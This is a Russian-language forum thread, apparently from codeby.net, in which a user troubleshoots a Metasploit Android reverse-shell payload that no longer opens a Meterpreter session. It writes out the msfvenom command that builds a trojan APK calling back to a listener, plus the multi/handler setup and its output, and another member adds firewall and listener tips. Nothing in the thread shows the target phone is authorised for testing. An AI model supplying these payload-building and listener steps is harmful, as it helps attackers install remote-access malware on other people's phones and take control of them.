Проблема Метерпретер и android

s unity

s unity

Well-known member
18.09.2019
118
11
всем приветики!!! такие вот дела: создаю payload
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.105 LPORT=4444 -f raw -o /tmp/android.apk
потом:
msf5> use exploit/multi/handler
msf5> exploit(multi/handler) set PAYLOAD android/meterpreter/reverse_tcp
msf5> exploit(multi/handler) set LHOST 192.168.0.105
msf5> exploit(multi/handler) set LPORT 4444
msf5> exploit(multi/handler) exploit
запустился handler и слушает пакеты... в это время скидываю android.apk, запускаю.
такая картина:
[*] Started reverse TCP handler on 192.168.0.105:4444
[*] Sending stage (73550 bytes) to 192.168.0.104


прилетает сессия, handler учуял какие то движения на порту 4444, и все. метерпретер не запускается.
заметьте, это в локальной сети! если пропускать через ngrok сессия (не в локалке) токартина почти такая же. handler пишет что прилетела сессия 1, и так же метерпретер тупа не запускается....
я вот не пойму, это у меня что-то с метерпретером/метасплоитом или же проблема в другом?
PS примерно месяц назад все работало. может это обновления андроида? (обновил дроид неделю назад). не верится что столько лет жили с такой уязвимость, а тут неделю назад решили устранить это..
я бы поробовал на более старой версии андроида но нет его у меня, зато есть вы и codeby.net :D
 
Последнее редактирование:
mrOkey

mrOkey

Red Team
14.11.2017
765
773
Не знаю опечатался ты тут или у себя в консоле, но ты создаёшь веномский Пайлод для ип 1092.168.0.105

Ну и да дырку могли пофиксать, они не зря свой хлеб кушают
 
s unity

s unity

Well-known member
18.09.2019
118
11


веномский Пайлод
а в чем разница? метерпретер та один? может я что-то не знаю.... просвети))
вот совсем не хочется думать что там такие балбесы сидят... годами не исправляли, а тут решили исправить...

Не знаю опечатался ты тут или у себя в консоле, но ты создаёшь веномский Пайлод для ип 1092.168.0.105

Ну и да дырку могли пофиксать, они не зря свой хлеб кушают
msf > use payload/android/meterpreter/reverse_tcp
msf payload(reverse_tcp) > set LHOST 192.168.0.105
LHOST => 192.168.0.105
msf payload(reverse_tcp) > generate -t raw -f /tmp/android.apk
[*] Writing 8992 bytes to /tmp/android.apk...
msf payload(reverse_tcp) >

ты про это?
 
s unity

s unity

Well-known member
18.09.2019
118
11
я тебя не понимаю...
а чем еще создать та ?
с помощью msfvenom я создаю файл .apk в котором сидит пейлоад android/meterpreter/reverse_tcp который будет отправлять сессию на 192.168.0.105 по 4444 порту, который заблаговременно слушает handler.. если что-то не так, поправь меня
 
mrOkey

mrOkey

Red Team
14.11.2017
765
773
я тебя не понимаю...
а чем еще создать та ?
с помощью msfvenom я создаю файл .apk в котором сидит пейлоад android/meterpreter/reverse_tcp который будет отправлять сессию на 192.168.0.105 по 4444 порту, который заблаговременно слушает handler.. если что-то не так, поправь меня
Да блин, ты внимательно посмотри на параметр LHOST.
Я тебе говорю, что я не знаю где ты опечатался - тут или у себя в консоле. Потому что в сообщении ты написал 1092.168 и далее
 
s unity

s unity

Well-known member
18.09.2019
118
11
параметр LHOST 1092.168 и далее
ааа блин :D здесь опечатался. щас поправлю))) я уже о другом подумал, начал гуглить. уже зарегался на ноунейм форумах, поднял кучу статей... а тут всего лишь опечатка :D
 
mrOkey

mrOkey

Red Team
14.11.2017
765
773
окей, тогда по порядку. Порт 4444 в фаерволе открыл?

ещё чекни этот параметр для листнера
Код:
msf exploit(handler) > set EXITONSESSION false
 
mrOkey

mrOkey

Red Team
14.11.2017
765
773
сессия ведь прилетает...
сейчас чекнул namp свой ип 192.168.0.105
4444/tcp open krb524
вызывает подозрения процесс krb524 на этом порту
nmap выносит предположение о сервисе. Не факт что у тебя именно он висит.
 
Мы в соцсетях: